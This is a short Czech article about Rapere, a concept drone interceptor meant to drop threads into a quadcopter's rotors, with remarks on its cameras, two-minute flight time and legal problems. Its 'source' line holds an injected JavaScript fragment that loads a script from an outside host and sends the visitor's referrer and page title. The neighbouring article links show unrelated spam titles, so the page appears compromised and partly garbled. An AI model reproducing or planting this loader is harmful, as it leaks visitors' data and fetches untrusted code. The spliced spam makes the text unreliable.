UAV | UAS

Rapere – lovec dronů

S rostoucí popularitou dronů, které zhusta začínají narušovat soukromí, se samozřejmě objevují nápady a řešení, jak se těmto dotěrům bránit. I když je myšlenka na tohoto interceptora dronů vychází ze snahy vyřídit si to s neodbytnými slídily, využití by pro něj našla i armáda a další uživateleé ze státní sféry. Zvláště při čtení posledních studí, hodnotících ohrožení strategické ingfrastruktury, je nebezpečí teroristických útoků s využitím dronů na prvních místech předpokládaných hrozeb.

Rapere by si měl především poradit s drony typu kvadroptér, využívající rotor, které by měl být schopen vyhledat ve své blízkosti a neutralizovat. Jeho celková doba letu by měla být 2 minuty, což je dáno vyšší rychlostí toho interceptora tak, aby byl schopen dostihnout protivníka. Pro vyhledávání se počítá s jeho osazením 12 VGA kamerami s rychosti 90fps, což by mělo zaručit dostatečnou kapacitu pro sledování cíle. Poté co se Rapere dostane nad cíl, na něj vypustí vlákna/provázek, které se zamotají do rotoru cílového dronu.

Koncept má z hlediska legislativy řadu otázek, od zničení cizího předmětu, až po ohrožení z padajícího zneškodněného dronu, takže se asi vbrzku nedočkáme jeho komerčního nasazení, ale pro státní sféru by podobné dorny, včetmě „sebevražedných“, které by mohly fungovat podobně jako PLŘS a ničít cíl přímým zásahem nebo střepinovou explozí, jsou lákavou alternativou zajištění bezpečnosti důkežitých objektů – především díky relativně nízké ceně.

1 2 3 4 5 6
zdroj: rapere.ios.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;

Předchozí článek

Maybe Lifetime Network has a good movie on that I can get her

Další článek

After a few days you will be able to sleep without the drug